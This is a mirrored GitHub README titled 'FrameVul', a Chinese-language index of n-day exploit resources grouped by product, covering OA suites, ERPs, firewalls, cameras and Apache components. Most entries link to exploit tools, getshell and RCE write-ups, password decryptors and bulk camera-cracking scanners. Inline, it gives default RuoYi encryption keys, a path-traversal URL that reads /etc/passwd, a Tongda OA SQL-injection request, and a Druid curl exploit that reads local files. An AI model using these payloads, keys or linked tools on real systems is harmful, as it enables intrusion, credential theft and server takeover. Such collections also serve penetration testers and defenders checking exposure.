Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/Awrrays/FrameVul

POC集合,框架nday漏洞利用
https://github.com/Awrrays/FrameVul

Last synced: 22 days ago
JSON representation

POC集合,框架nday漏洞利用

Awesome Lists containing this project

README

        

# FrameVul

## 综合

- [主流供应商的一些攻击性漏洞汇总](https://github.com/r0eXpeR/supplier)
- [2021_Hvv漏洞](https://github.com/hhroot/2021_Hvv)
- [2022年Java应用程序的CVE漏洞](https://github.com/HackJava/CVE2022)
- [漏洞库合集](https://github.com/cckuailong/vulbase)
- [公开的信息、漏洞利用、脚本](https://github.com/pedrib/PoC)
- [Goby POC](https://github.com/aetkrad/goby_poc)
- [nuclei-templates](https://github.com/projectdiscovery/nuclei-templates)
- [LiqunKit_](https://github.com/Liqunkit/LiqunKit_)
- [强化fscan的漏扫POC库](https://github.com/chaosec2021/fscan-POC)
- [在渗透测试中快速检测常见中间件、组件的高危漏洞。](https://github.com/1120362990/vulnerability-list)
- [OAExploit一款基于产品的一键扫描工具](https://github.com/achuna33/MYExploit)
- [批量扫描破解海康威视、大华等摄像头的常见漏洞。](https://github.com/WhaleFell/CameraHack)
- [网络摄像头漏洞检测脚本.Nmap (Nse Nmap script engine)](https://github.com/foggyspace/NsePocsuite-lua)
- [网络摄像头漏洞扫描工具 | Webcam vulnerability scanning tool](https://github.com/jorhelp/Ingram)

## 1Panel

[1Panel loadfile 后台文件读取漏洞](https://peiqi.wgpsec.org/wiki/webapp/1Panel/1Panel%20loadfile%20%E5%90%8E%E5%8F%B0%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html)

## 奥威亚视频云平台

[奥威亚视频云平台VideoCover.aspx接口存在任意文件上传漏洞 附POC](https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247484789&idx=1&sn=7a1fb2328cb346e2651bea73ba7b37b5)

## 昂捷ERP

[昂捷ERP多处接口存在SQL注入(0day)](https://mp.weixin.qq.com/s/r-m73kfEOgq93LP1t0fXoA)

## 宝塔

[宝塔面板Windows版提权方法](https://github.com/Hzllaga/BT_Panel_Privilege_Escalation)

[宝塔linux面板 <6.0 存储形xss](https://mp.weixin.qq.com/s/gtYyyhye90ZPILWCGsGKGQ)

## 百卓网络Smart

[百卓网络Smart S20文件上传漏洞](https://github.com/flyyue2001/cve/blob/main/smart_sql_updateos.md)

## 辰信领创

[辰信景云终端安全管理系统 login存在 SQL注入漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E8%BE%B0%E4%BF%A1%E9%A2%86%E5%88%9B/%E8%BE%B0%E4%BF%A1%E9%A2%86%E5%88%9B%20%E8%BE%B0%E4%BF%A1%E6%99%AF%E4%BA%91%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20login%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html)

## 钉钉

[钉钉RCE](https://github.com/crazy0x70/dingtalk-RCE)

## 亿邮电子邮件系统

[(CNVD-2021-26422)亿邮电子邮件系统 远程命令执行漏洞](https://github.com/Henry4E36/eyouRCE)

## 泛微OA

[泛微OA某版本的SQL注入漏洞](https://github.com/Wrin9/weaverOA_sql_injection)

[应用安全 - 软件漏洞 - 泛微OA漏洞汇总](https://www.cnblogs.com/AtesetEnginner/p/11558469.html)

[泛微 e-mobile 相关漏洞](https://mp.weixin.qq.com/s/nYTXWXs-40oR41k1UsHJyw)

[z1un/weaver_exp](https://github.com/z1un/weaver_exp)

[关于表达式注入的小记录](https://zhuanlan.zhihu.com/p/26052235)

[泛微 E-Mobile Ognl 表达式注入](https://blog.csdn.net/qq_27446553/article/details/68203308)

[泛微e-cology7.1 SOAP注入引发的血案](https://www.mrwu.red/web/1598.html)

[泛微协同商务系统e-cology某处SQL注入](https://www.uedbox.com/post/14232/)

[泛微e-cology OA Beanshell组件远程代码执行漏洞复现](https://mp.weixin.qq.com/s/LpXiLukOKMfMSa8gUYBqNA)

[ecology8_mobile_sql_inject](https://github.com/orleven/Tentacle/blob/6e1cecd52b10526c4851a26249339367101b3ca2/script/ecology/ecology8_mobile_sql_inject.py)

[泛微E-Cology WorkflowServiceXml RCE](http://wiki.peiqi.tech/PeiQi_Wiki/OA产品漏洞/泛微OA/泛微E-Cology%20WorkflowServiceXml%20RCE.html?h=泛微E-Cology%20WorkflowServiceXml%20RCE)

[泛微OA weaver.common.Ctrl 任意文件上传漏洞](https://mp.weixin.qq.com/s/ePYRFPfu-pvWMKSiffporA)

[泛微OA 前台GetShell复现](https://ailiqun.xyz/2021/05/02/泛微OA-前台GetShell复现/)

[泛微e-cology任意文件上传(已修复)](https://mp.weixin.qq.com/s/3ip7-U8BsWgq3N4SP5xd4w)

[泛微e-cology另一接口任意文件上传(已修复)](https://mp.weixin.qq.com/s/nRnNyFfDQYxmFwA-7-IBVQ)

[OfficeServer 文件上传](https://github.com/sobinge/2022-HW-POC/blob/main/泛微OA%20uploaderOperate.jsp%20文件上传.md)

[E-office Server_v9.0 漏洞分析](https://mp.weixin.qq.com/s/JP-kIsWeQ0HZPs9jZjL24A)

[某 E-Office v9 任意文件上传漏洞复现](https://www.o2oxy.cn/3860.html)

[bigsizeme/CNVD-2021-49104](https://github.com/bigsizeme/CNVD-2021-49104)

[泛微oa漏洞利用工具](https://github.com/TD0U/WeaverScan)

[组合利用泛微信息泄漏漏洞和任意用户登录漏洞,可获取全部loginId并测试登录](https://github.com/A0WaQ4/Weaver_ofslogin_vul)

[泛微移动管理平台E-mobile lang2sql接口存在任意文件上传](https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247484476&idx=1&sn=2eeef68570e6ab7d8a2789e07b8609ad)

## 帆软报表

[帆软报表v8.0 Getshell漏洞分析](http://foreversong.cn/archives/1378)

[帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757](https://mp.weixin.qq.com/s/ae8A8PGJCtr6uS11dRpzcw)

[帆软 V9 getshell](https://www.o2oxy.cn/3368.html)

## 飞企互联

[飞企互联 FE业务协作平台 ShowImageServlet 任意文件读取漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E9%A3%9E%E4%BC%81%E4%BA%92%E8%81%94/%E9%A3%9E%E4%BC%81%E4%BA%92%E8%81%94%20FE%E4%B8%9A%E5%8A%A1%E5%8D%8F%E4%BD%9C%E5%B9%B3%E5%8F%B0%20ShowImageServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html)

[飞*互联登录绕过代码分析](https://mp.weixin.qq.com/s?__biz=MzIyNjk0ODYxMA==&mid=2247487275&idx=1&sn=4031748decc2d11fdffea2650ddaa1b0)

## 好视通-视频会议

[某某通视频会议存在任意文件读取漏洞](https://mp.weixin.qq.com/s?__biz=MzkwODMzOTA2NA==&mid=2247492873&idx=1&sn=6e9798e0a06b1cf92cb669c2178a13e1)

## 汉得SRM

[汉得SRM tomcat.jsp 登陆绕过漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E6%B1%89%E5%BE%97/%E6%B1%89%E5%BE%97SRM%20tomcat.jsp%20%E7%99%BB%E9%99%86%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.html)

## 华天动力-OA

[CVE-2021-45897 全球最大CRM系统SuiteCRM远程命令执行漏洞分析与复现](https://mp.weixin.qq.com/s/KVVgiECEr7ivBfXnByi5RQ)

## 金蝶云星空

[金蝶云星空任意文件上传漏洞](https://blog.csdn.net/qq_41904294/article/details/134204734)

[金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞 附POC](https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247484562&idx=1&sn=fdd093b972b20fc842b110ac1cec75db)

## 金盘 微信管理平台

[金盘 微信管理平台 getsysteminfo 未授权访问漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E9%87%91%E7%9B%98/%E9%87%91%E7%9B%98%20%E5%BE%AE%E4%BF%A1%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20getsysteminfo%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.html)

## 金山终端安全系统

[金山终端安全系统V9.0SQL注入漏洞](https://github.com/luck-ying/Library-POC/blob/40f8d4051a239ac9b49c77ea0152c394e8b38acb/%E9%87%91%E5%B1%B1%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F/%E9%87%91%E5%B1%B1%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9FV9.0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.py)

## 蓝凌OA

[yuanhaiGreg/LandrayExploit](https://github.com/yuanhaiGreg/LandrayExploit)

[ 蓝凌OA的前后台密码的加解密工具](https://github.com/zhutougg/LandrayDES)

[蓝凌OA custom.jsp 任意文件读取漏洞](https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw)

[蓝某OA前台SSRF进一步利用到RCE](https://mp.weixin.qq.com/s/fNovp4mbKIMkVdF2ywcQcQ)

[蓝凌 OA treexml.tmpl script 远程代码执行漏洞](https://github.com/tangxiaofeng7/Landray-OA-Treexml-Rce)

[蓝凌EIS saveIm文件上传](https://github.com/MzzdToT/HAC_Bored_Writing/blob/main/Fileupload/%E8%93%9D%E5%87%8CEIS/EIS_upload.py)

## 联软准入系统

[联软准入系统任意文件上传](https://www.hedysx.com/2627.html)

## 绿盟 NF下一代防火墙

[绿盟 NF下一代防火墙 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E7%BB%BF%E7%9B%9F/%E7%BB%BF%E7%9B%9F%20NF%E4%B8%8B%E4%B8%80%E4%BB%A3%E9%98%B2%E7%81%AB%E5%A2%99%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)

## 契约锁

[漏洞利用:某某锁代码执行漏洞实战注入内存马](https://1oecho.github.io/oYmYrVh51/)

## 企望制造 ERP

[企望制造 ERP comboxstore.action 远程命令执行漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E4%BC%81%E6%9C%9B/%E4%BC%81%E6%9C%9B%E5%88%B6%E9%80%A0%20ERP%20comboxstore.action%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html)

## 锐捷

[锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/iot/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7%20NBR%20%E8%B7%AF%E7%94%B1%E5%99%A8%20fileupload.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)

[锐捷 BCR商业无线云网关 后台命令执行漏洞](https://peiqi.wgpsec.org/wiki/iot/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7%20BCR%E5%95%86%E4%B8%9A%E6%97%A0%E7%BA%BF%E4%BA%91%E7%BD%91%E5%85%B3%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html)

## 若依

默认Key

```
fCq+/xW488hMTCD+cmJ3aQ==
zSyK5Kp6PZAAjlT+eeNMlg==
```

后台任意文件读取

- RuoYi <= v4.5.0

```
/common/download/resource?resource=/profile/../../../../etc/passwd
```

Druid 未授权访问

```
/prod-api/druid/index.html
```

[若依后台定时任务一键利用](https://github.com/passer-W/Ruoyi-All)

[Xcheck Java引擎漏洞挖掘&防护识别](https://mp.weixin.qq.com/s/FPMUVoSqc0Lsf5BQx07ADw)

[记一次若依cms后台getshell](https://bkfish.gitee.io/2021/06/26/记一次若依cms后台getshell/)

[用于windows反弹shell的yaml-payload](https://github.com/bkfish/yaml-payload-for-Win)

[若依CMS4.6.0后台RCE](https://www.cnblogs.com/r00tuser/p/14693462.html)

[若依CMS后台getshell](http://www.yongsheng.site/2021/08/31/若依CMS后台getshell/)

## 深信服 Sangfor

[深信服 应用交付管理系统 login 远程命令执行漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E6%B7%B1%E4%BF%A1%E6%9C%8D/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20login%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html)

## 通达OA

[通达OA多处SQL注入漏洞](https://mp.weixin.qq.com/s/DcwDz11f6g7uguuBGsin7A)

[OA-HUNTER/TongDa-OA](https://github.com/OA-HUNTER/TongDa-OA)

[ 通达OA综合利用工具](https://github.com/xinyu2428/TDOA_RCE)

[python编写的多个通达常见漏洞exp](https://github.com/kitezzzGrim/tongda-exp)

[通达OA V11.5电子邮箱接口SQL注入复现](https://mp.weixin.qq.com/s/3JtV-oVGIyzy9ly6n4fMiA)

[通达OA任意文件上传和文件包含漏洞导致RCE详细代码审计分析及Poc构造复现](https://www.freebuf.com/column/230871.html)

[jas502n/OA-tongda-RCE](https://github.com/jas502n/OA-tongda-RCE)

[通达OA11.6 preauth RCE 0day分析](https://drivertom.blogspot.com/2020/08/oa116-preauth-rce-0day.html)

[poc_and_exp/rce.py](https://github.com/TomAPU/poc_and_exp/blob/master/rce.py)

[通达OA v11.7后台SQL注入到RCE 0day](https://mp.weixin.qq.com/s/rtX9mJkPHd9njvM_PIrK_Q)

[通达OA v11.7 在线用户登录漏洞](https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ)

[通达OA11.7 利用新思路(附EXP)](https://mp.weixin.qq.com/s/LJRI04VViL4hbt6dbmGHAw)

[通达OA 后台getshell 新思路](https://www.o2oxy.cn/2738.html)

[通达 OA 11.7 组合拳 RCE 利用分析](https://sec-in.com/article/921)

[通达OA v11.8 存储型XSS 与 命令执行](https://www.tooltool.net/2710355.html)

[通达 OA 代码审计篇二 :11.8 后台 Getshell](https://paper.seebug.org/1499/)

[通达oa 11.8 后台getshell](https://github.com/z1un/TongdaOA-exp)

[通达OA-V11.8-api-ali.php文件上传漏洞](https://www.cnblogs.com/hmesed/p/16195551.html)

通达OA v11.9 upsharestatus 后台SQL注入漏洞

```
POST /general/appbuilder/web/portal/workbench/upsharestatus HTTP/1.1
Content-Type: application/x-www-form-urlencoded

uid=15&status=1&id=1;select sleep(4)
```

[某知名OA高版本getshell思路(附部分脚本)](https://mp.weixin.qq.com/s/HU-KxA75PR3u47QOqKWktQ)

[通达OA v11.10 sql注入漏洞复现](https://www.yulate.com/303.html)

## 网神

[网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞 ](https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)

## 网御 ACM上网行为管理系统

[网御 ACM上网行为管理系统 bottomframe.cgi SQL注入漏洞](https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E5%BE%A1%20ACM%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20bottomframe.cgi%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html)

## 万户OA

- [户OA smartUpload.jsp 任意文件上传漏洞](https://anpaini.com/2022/OA产品漏洞/万户OA%20smartUpload.jsp%20任意文件上传漏洞/)
- [万户OA upload任意文件上传漏洞复现](https://blog.csdn.net/qq_41904294/article/details/134515628)

## 信呼 OA

[信呼OA存储型XSS 0day复现](https://xz.aliyun.com/t/7887)

## 云时空社会化商业ERP系统

[云时空社会化商业ERP系统gpy任意文件上传漏洞RCE](https://mp.weixin.qq.com/s?__biz=MzkyOTQ1MjQwMw==&mid=2247483863&idx=1&sn=fca9ddbb361c88112279929d5c25065b)

## 用友NC

[用友nc数据库密码解密](https://github.com/jas502n/ncDecode)

[kezibei/yongyou_nc_poc](https://github.com/kezibei/yongyou_nc_poc)

[用友GRP-U8行政事业财务管理软件 SQL注入 CNNVD-201610-923](http://wiki.peiqi.tech/PeiQi_Wiki/OA产品漏洞/用友OA/用友GRP-U8行政事业财务管理软件%20SQL注入%20CNNVD-201610-923.html)

[用友NC反序列化漏洞简单记录(DeleteServlet、XbrlPersistenceServlet等)](https://www.jianshu.com/p/14449a6edd05)

[用友 NC XbrlPersistenceServlet反序列化](http://wiki.peiqi.tech/PeiQi_Wiki/OA产品漏洞/用友OA/用友%20NC%20XbrlPersistenceServlet反序列化.html)

[某C 1day 反序列化漏洞的武器级利用](https://mp.weixin.qq.com/s/IdXYbjNVGVIasuwQH48Q1w)

[用友NC任意文件上传漏洞复现](https://www.adminxe.com/2075.html)

[用友nc 反序列化回显构造思路](https://zhzhdoai.github.io/2020/09/17/某NC-反序列化回显构造/)

[用友NC反序列化 简单分析](https://blog.sari3l.com/posts/608d18f0/)

[CNVD-2022-60632 畅捷通任意文件上传漏洞复现](https://www.o2oxy.cn/4104.html)

[用友 NC Cloud jsinvoke 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20NC%20Cloud%20jsinvoke%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)

[用友 移动管理系统 uploadApk.do 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20%E7%A7%BB%E5%8A%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20uploadApk.do%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)

[用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞](https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20CRM%E5%AE%A2%E6%88%B7%E5%85%B3%E7%B3%BB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20getemaildata.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html)

[用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20CRM%E5%AE%A2%E6%88%B7%E5%85%B3%E7%B3%BB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20getemaildata.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)

## 用友U8Cloud

[[在野漏洞]用友U8-cloud SQL注入漏洞](https://mp.weixin.qq.com/s?__biz=MzkxMTUwOTY1MA==&mid=2247483833&idx=1&sn=ff942057f579b746a56cd799c81f5064)

## 用友GRP

[用友GRP xxe getshell分析(附exp)](https://mp.weixin.qq.com/s?__biz=MzkxNjQyMjcwMw==&mid=2247485270&idx=1&sn=6d10fa9d349c3104bf317c5849e9f299)

## 致远OA

[致远OA管理员密码的重置](https://blog.csdn.net/qq_33064191/article/details/119921106)

[数据库Pass解密](https://github.com/Rvn0xsy/PassDecode-jar)

[Seeyon A8 登录hash破解案例](https://www.hedysx.com/2807.html)

[Summer177/seeyon_exp](https://github.com/Summer177/seeyon_exp)

[nex121/SeeyonEXP](https://github.com/nex121/SeeyonEXP)

[致远OA帆软报表组件反射型XSS&SSRF漏洞](https://landgrey.me/blog/7/)

[致远OA帆软报表组件前台XXE漏洞挖掘过程](https://landgrey.me/blog/8/)

[致远A8协同办公系统poc/seeyon 0day](https://www.jianshu.com/p/562f45edde2d)

[致远 OA A8 htmlofficeservlet getshell (POC&EXP)](http://wyb0.com/posts/2019/seeyon-htmlofficeservlet-getshell/)

[致远OA任意管理员登陆漏洞分析](https://mp.weixin.qq.com/s/tWKCgmptOsouOllDSXBTiw)

[致远OA ajax.do登录绕过任意文件上传](https://mp.weixin.qq.com/s/dk6aZY2fuJ_08tSOOh1Vzw)

[致远OA ajaxAction formulaManager 文件上传漏洞](https://mp.weixin.qq.com/s/ZyPwCytO7NLUuo9rfKtgyQ)

[致远OA fastjson远程代码执行漏洞复现](https://mp.weixin.qq.com/s/a1KbLlb7ZOXfeXUyhLhpMw)

[致远伪0day_FastJson利用链](https://mp.weixin.qq.com/s/yTuQLqqvikwo1KfK-zGBBA)

[致远 OA FastJson rce 回显](https://96.mk/2021/07/10/19.html)

[致远oa xxe getshell分析(附脚本)](https://mp.weixin.qq.com/s/efuMlGrjYsUjP7nP3W2F4w)

[某远M3 前台远程代码执行漏洞](https://xz.aliyun.com/t/13078)

[致远M3-server反序列化RCE漏洞复现(附POC)](https://mp.weixin.qq.com/s?__biz=MzU1ODQ2NTY3Ng==&mid=2247484745&idx=1&sn=98c5d18f55ff883a186ce0a5527c2c64)

## 浙大恩特客户资源管理系统

[浙大恩特客户资源管理系统fileupload.jsp文件上传](https://mp.weixin.qq.com/s/8BpPzi_7SfJWEQG5N988Mg)

[浙大恩特CRM文件上传(梅开二度)](https://mp.weixin.qq.com/s/TUICrxb3HjTBxe175hI7Fg)

[【紧急警告】某大科恩CMR 0day](https://mp.weixin.qq.com/s?__biz=MzkxMDYwNDI0MA==&mid=2247483841&idx=1&sn=9e29324912fa755f24265ce0d6446e84)

## 74CMS

[骑士 CMS 6.0.48以下文件包含getshell](https://mp.weixin.qq.com/s/erBzIapx1bz8f1ArWwwBwQ)

## Adminer

[Adminer≤4.6.2任意文件读取漏洞](https://mp.weixin.qq.com/s/ZYGN8WceT2L-P4yF6Z8gyQ)

## Apache

[利用最新Apache解析漏洞(CVE-2017-15715)绕过上传黑名单](https://www.leavesongs.com/PENETRATION/apache-cve-2017-15715-vulnerability.html)

[Apache HTTPD 换行解析漏洞(CVE-2017-15715)](https://vulhub.org/#/environments/httpd/CVE-2017-15715/)

[Apache SSI 远程命令执行漏洞](https://vulhub.org/#/environments/httpd/ssi-rce/)

[Apache 提权漏洞(CVE-2019-0211)复现](https://paper.seebug.org/889/)

[【最新漏洞预警】CVE-2021-40438-Apache httpd mod_proxy SSRF漏洞深入分析与复现](https://mp.weixin.qq.com/s/tYM6z9S1WZjPjfCt2MHOAQ)

[Apache mod_proxy SSRF(CVE-2021-40438)的一点分析和延伸](https://mp.weixin.qq.com/s/sbFs7kZ8tExwZPeUvq1hJw)

[CVE-2021-41773 | CVE-2021-42013 漏洞利用工具 (Apache/2.4.49-2.4.50)](https://github.com/CalfCrusher/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit)

[Apache任意文件读取补丁绕过(CVE-2021-42013)](https://mp.weixin.qq.com/s/UzKu4mze02umEhxJAJpp9g)

[Apache2.4.50 CVE-2021-41773 cve-2021-42013 复现](https://www.o2oxy.cn/3740.html)

## Apache ActiveMQ

[ActiveMQ系列漏洞汇总复现](https://mp.weixin.qq.com/s/5U7v22q2WeLmCnkq7mfr8w)

[ActiveMQ 反序列化漏洞 (CVE-2015-5254)](https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2015-5254/README.zh-cn.md)

[ActiveMQ任意文件写入漏洞 (CVE-2016-3088)](https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2016-3088/README.zh-cn.md)

[ActiveMQ RCE](https://github.com/trganda/ActiveMQ-RCE)

[CVE-2023-46604 之 ActiveMQ RCE 漏洞验证/利用工具](https://mp.weixin.qq.com/s?__biz=Mzk0NjQ5MTM1MA==&mid=2247485403&idx=2&sn=0cdcd266b4761c8ee0ff57bb0b399b08)

## Apache Airflow

[Mr-xn/CVE-2022-40127](https://github.com/Mr-xn/CVE-2022-40127)

## Apache APISIX

[CVE-2022-24112 Apache APISIX apisix/batch-requests RCE](https://github.com/Mr-xn/CVE-2022-24112/blob/main/CVE-2022-24112.yaml)

[Apisix dashboard未授权访问到rce,含发现poc思路&复现环境](https://mp.weixin.qq.com/s/knTotxOeFlzcxvoQYSljCQ)

## Apache Axis

[Apache Axis1 与 Axis2 WebService 的漏洞利用总结](https://paper.seebug.org/1489/#2-apache-axis2)

[axis 1.4 AdminService未授权访问 jndi注入利用](https://jianfensec.com/渗透测试/axis 1.4 AdminService未授权访问 jndi注入命令执行利用/)

[KibodWapon/Axis-1.4-RCE-Poc](https://github.com/KibodWapon/Axis-1.4-RCE-Poc)

[【漏洞复现】Axis2默认弱口令后台Getshell](https://mp.weixin.qq.com/s/Gp_FMM-n472wYTBA5lC3lw)

## Apache Druid

[Apache Druid 漏洞总结](https://mp.weixin.qq.com/s/ZT5j9clfENsEWMSKuKkw1g)

[Druid未授权(弱口令)的一些利用方式](https://www.cnblogs.com/cwkiller/p/12483223.html)

[Druid未授权漏洞实战利用](https://www.t00ls.net/articles-62541.html)

[yuyan-sec/druid_sessions](https://github.com/yuyan-sec/druid_sessions)

[Apache Druid 远程代码执行漏洞 CVE-2021-25646](http://wiki.peiqi.tech/PeiQi_Wiki/Web服务器漏洞/Apache/Apache Druid/Apache Druid 远程代码执行漏洞 CVE-2021-25646.html)

[漏洞复现: Apache Druid 远程代码执行漏洞 (CVE-2021-25646)](https://paper.seebug.org/1476/)

[Apache Druid CVE-2021-26919 漏洞分析](http://m0d9.me/2021/04/21/Apache-Druid-CVE-2021-26919-漏洞分析/)

CVE-2021-36749

```sh
curl http://127.0.0.1:8888/druid/indexer/v1/sampler?for=connect -H "Content-Type:application/json" -X POST -d "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}"
```

## Apache Dubbo

[Apache Dubbo (CVE-2023-23638)漏洞利用的工程化实践](https://github.com/YYHYlh/Apache-Dubbo-CVE-2023-23638-exp)

## Apache Flink

[CVE-2020-17518&17519:Flink两个漏洞复现](https://mp.weixin.qq.com/s/9xLQ1YAWVtHBv9qVk-Xc1A)

[漏洞复现|Apache Flink(CVE-2020-17519)漏洞分析](https://mp.weixin.qq.com/s/6Z7ilX_bwSBU8EWfStAc5w)

## Apache Kylin

[CVE-2021-45456 apache kylin命令执行](https://github.com/Awrrays/Awrrays-Team-VulLab/blob/main/Middleware/apache/Apache Kylin/CVE-2021-45456.md)

## Apache Solr

[Solr RCE 整理](https://github.com/Imanfeng/Apache-Solr-RCE)

[Apache Solr 注入研究](https://github.com/veracode-research/solr-injection)

[Apache solr XML 实体注入漏洞 (CVE-2017-12629)](https://vulhub.org/#/environments/solr/CVE-2017-12629-XXE/)

[Apache Solr 远程命令执行漏洞 (CVE-2017-12629)](https://vulhub.org/#/environments/solr/CVE-2017-12629-RCE/)

https://github.com/mpgn/CVE-2019-0192/

[Apache Solr 远程命令执行漏洞 (CVE-2019-0193)](https://vulhub.org/#/environments/solr/CVE-2019-0193/)

[Apache Solr DataImportHandler 远程代码执行漏洞(CVE-2019-0193) 分析](https://paper.seebug.org/1009/)

[jas502n/CVE-2019-0193](https://github.com/jas502n/CVE-2019-0193)

[Apache Solr不安全配置远程代码执行漏洞复现及jmx rmi利用分析](https://mp.weixin.qq.com/s/P626BC3-JcBc3ewdlslO2w)

[jas502n/CVE-2019-12409](https://github.com/jas502n/CVE-2019-12409)

[Apache Solr最新漏洞复现](https://xz.aliyun.com/t/6679)

[Microsoft Apache Solr RCE Velocity Template | Bug Bounty POC](https://blog.securitybreached.org/2020/03/31/microsoft-rce-bugbounty/)

[Apache Solr Velocity RCE 真的getshell了吗?](https://www.hayasec.me/2019/11/06/apache-solr-velocity-rce-getshell/)

[Solr 模板注入漏洞图形化一键检测工具](https://github.com/SDNDTeam/CVE-2019-17558_Solr_Vul_Tool)

[CVE-2020-13957:Apche Solr 未授权上传漏洞复现](https://mp.weixin.qq.com/s/EbNK_PQZwgR6K31HwjAVRQ)

[CVE-2020-13957 Apache Solr 未授权上传漏洞](https://mp.weixin.qq.com/s/5iwk08z3oP9Tim5ETBIBBg)

[CVE-2020-13957:Apache Solr 未授权上传漏洞复现](https://mp.weixin.qq.com/s/1I-EwYWMnlsLsVf67F3G1w)

[Solr任意文件读取漏洞环境搭建和复现](https://mp.weixin.qq.com/s/1AYen3qZMhiiym_wJh5lzw)

[Apache Solr<= 8.8.2 (最新) 任意文件删除](https://mp.weixin.qq.com/s/dECH74n5qjrWT9lok8IkPQ)

[Henry4E36/Solr-SSRF](https://github.com/Henry4E36/Solr-SSRF)

